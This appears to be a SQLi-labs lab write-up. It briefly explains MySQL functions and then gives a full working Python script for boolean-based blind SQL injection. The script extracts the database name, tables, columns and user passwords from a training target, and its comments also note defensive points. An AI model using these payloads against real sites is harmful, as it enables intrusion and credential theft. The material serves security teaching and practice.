SQLI-LABS LESS5
Mysql重要函数介绍
ascii(char):
- char:返回该字符对应的ascii码
substr(str,position,length):
- str:主字符串
- position:指定从第几个字符开始
- length:需要获取的长度
length(str):返回str的字符串长度
database():查看当前使用的数据库库名
count():返回查询语句的结果数量
重要关键词
limit m,n:返回查询结果的m~m+n项
- m:从第几条开始,第一条为0
- n:指定长度
脚本代码
import requests
# Boolean-based blind extraction script from the SQLi-labs lesson (the page
# title says LESS5, the URL below points at Less-8; presumably both lessons
# answer with the same marker page — confirm).  Every request appends one
# condition to the vulnerable `id` parameter and treats the string
# "You are in" in the response body as the "condition is true" oracle; an
# unknown value is recovered by trying candidate integers / character codes
# one request at a time.  From a defender's view the script depends on two
# things: `id` being concatenated into the query instead of bound as a
# parameter, and the page differing between a true and a false condition.
# Removing either one breaks it, and the traffic shape (long runs of GETs to
# one endpoint whose `id` differs only by a counter) is what a WAF rule or a
# log review keys on.
# NOTE(review): the listing's indentation was lost in the paste; the nesting
# below is reconstructed from the control flow (`break`, `flag`, `k`
# bookkeeping) — confirm against the original before relying on it.
url = 'http://192.168.115.130/sqli-labs-master/Less-8/?id='
# Length of the current database name: ask "length(database()) == i" for
# i in 1..19.  `--+` comments out the rest of the original query; the '+' is
# the URL form of a space.
db_length = 0
for i in range(1, 20):
    db_payload = "1' and (length(database())=%d) --+" % i
    r = requests.get(url+db_payload)
    if "You are in" in r.text:
        print("数据库长度为:", i)
        db_length = i
        break
# If nothing matched, db_length is still 0 and the name loop below runs zero times.
# Database name, one character at a time: the guess db_name + chr(j) is
# compared with left(database(), i).  Codes 95..122 are '_', '`' and
# 'a'..'z', so a name containing digits or other characters is not
# recovered; matching an upper-case name presumably relies on MySQL's
# case-insensitive string comparison — confirm.  There is no `break` after
# a hit, so the remaining j values are still requested; they cannot match
# any more because the guess is then one character longer than the prefix.
db_name = ''
for i in range(1, db_length+1):
    for j in range(95, 123):
        db_payload = "1' and (left(database(),%d)='%s') --+" % (i, db_name+chr(j))
        r = requests.get(url+db_payload)
        if "You are in" in r.text:
            db_name = db_name+chr(j)
print("数据库名称为:", db_name)
# Number of tables in the recovered schema: count(table_name) compared with
# i in 0..99 (a schema with 100 or more tables leaves table_num at 0).
table_num = 0
for i in range(100):
    db_payload = "1' and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+" %(db_name, i)
    r = requests.get(url+db_payload)
    if "You are in" in r.text:
        table_num = i
        break
print("数据库当前有%d张表" % table_num)
# Table names.  Row i of information_schema.tables (limit i,1) is read at
# character position k via ascii(substr(...)); k advances on every hit.
# When the whole alphabet misses (last code 122) the name is taken as
# complete: flag ends the while loop and the name is stored.  A position
# past the end of the name matches nothing in 95..122, which is how the
# end is detected; a character outside that alphabet is indistinguishable
# from the end and truncates the name.  Note this phase filters on
# table_schema=database() rather than on db_name.
tables_name = []
for i in range(table_num):
    k = 1
    flag = 0
    table_name = ''
    while flag == 0:
        for j in range(95, 123):
            db_payload = "1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d --+" % (i, k, j)
            r = requests.get(url+db_payload)
            if "You are in" in r.text:
                k = k+1
                table_name = table_name+chr(j)
                break
            elif j == 122:
                flag = 1
                tables_name.append(table_name)
                break
# The interactive table selection below is disabled; the lesson hard-codes
# 'users' instead, so tables_name is collected but never used.
# print("当前扫描出的表:", end='')
# print(','.join(tables_name))
# while True:
#     print("请输入要扫描的表:", end='')
#     table = input()
#     if table in tables_name:
#         break
#     print("//// 输入错误,请重新输入 ////")
table_name = 'users'
column_num = 0
# Number of columns in that table: count(column_name) compared with i in 0..99.
for i in range(100):
    db_payload = ("1' and "
                  "(select count(column_name) from information_schema.columns where table_schema=database() and table_name='%s')"
                  "=%d --+") % (table_name, i)
    r = requests.get(url+db_payload)
    if 'You are in' in r.text:
        column_num = i
        break
# end='' keeps the comma-joined column names on the same output line.
print("该表共有", column_num, "个字段:", end='')
# Column names, recovered exactly like the table names above (same
# alphabet 95..122, same flag / k bookkeeping).  The payload literal spans
# several lines; the embedded newlines are part of the string that is sent.
columns_name = []
for i in range(column_num):
    column_name = ''
    k = 1
    flag = 0
    while flag == 0:
        for j in range(95, 123):
            db_payload = """1' and
ascii(substr((select column_name from information_schema.columns
where table_schema=database() and table_name='%s'
limit %d,1 )
,%d,1))=%d --+""" % (table_name, i, k, j)
            r = requests.get(url+db_payload)
            if "You are in" in r.text:
                k = k+1
                column_name = column_name+chr(j)
                break
            elif j == 122:
                flag = 1
                columns_name.append(column_name)
                break
print(','.join(columns_name))
# The discovered column list is discarded in favour of the lesson's known
# layout; columns_num is assigned but never read.
columns_name = ['id', 'username', 'password']
columns_num = 3
data_num = 0
# Row count: count(id) compared with i in 0..19 (a larger table leaves data_num at 0).
for i in range(20):
    db_payload = "1' and (select count(%s) from %s)=%d --+" % (columns_name[0], table_name, i)
    r = requests.get(url+db_payload)
    if "You are in" in r.text:
        data_num = i
        print("该表共有", data_num, "个数据")
        break
user_id = []
user_name = []
user_pw = []
# Row contents.  Each row is addressed with limit i,1; the three lists are
# filled in lockstep, one entry per row, printed as "id username password".
for i in range(data_num):
    # id: compared directly as an integer in 0..19.  An id outside that range
    # appends nothing, which shifts user_id out of step with the other two lists.
    for k in range(20):
        db_payload = "1' and (select %s from %s limit %d,1)=%d --+" % (columns_name[0], table_name, i, k)
        r = requests.get(url+db_payload)
        if "You are in" in r.text:
            user_id.append(k)
            print("%2d" % k, end=' ')
            break
    # username: position j is read via ascii(substr(...)); candidate codes are
    # digits, 'A'..'Z', '_', '`' and 'a'..'z', everything else in 48..122 is
    # skipped.  As with the names above, the first position where every
    # candidate misses ends the string, so a character outside this set
    # truncates it.  The `if k == 122` is only reached when 122 itself missed,
    # because a hit breaks out of the for loop first.
    un = ''
    flag = 0
    j = 1
    while flag == 0:
        for k in range(48, 123):
            if k not in range(48, 58) and k not in range(65, 91) and k not in range(95, 123):
                continue
            db_payload = "1' and ascii(substr((select %s from %s limit %d,1),%d,1))=%d --+" % (columns_name[1], table_name, i, j, k)
            r = requests.get(url+db_payload)
            if "You are in" in r.text:
                un += chr(k)
                j += 1
                break
            if k == 122:
                flag = 1
                user_name.append(un)
                print("%10s" % un, end=' ')
                break
    # password: same loop as username with '!', '-' and '@' (33, 45, 64)
    # added to the candidate set; the same truncation caveat applies.
    pw = ''
    flag = 0
    j = 1
    while flag == 0:
        for k in range(33, 123):
            if k not in (33, 45, 64) and k not in range(48, 58) and k not in range(65, 91) and k not in range(95, 123):
                continue
            db_payload = "1' and ascii(substr((select %s from %s limit %d,1),%d,1))=%d --+" % (columns_name[2], table_name, i, j, k)
            r = requests.get(url + db_payload)
            if "You are in" in r.text:
                pw += chr(k)
                j += 1
                break
            if k == 122:
                flag = 1
                user_pw.append(pw)
                print(" ", pw)
                break
部分运行结果: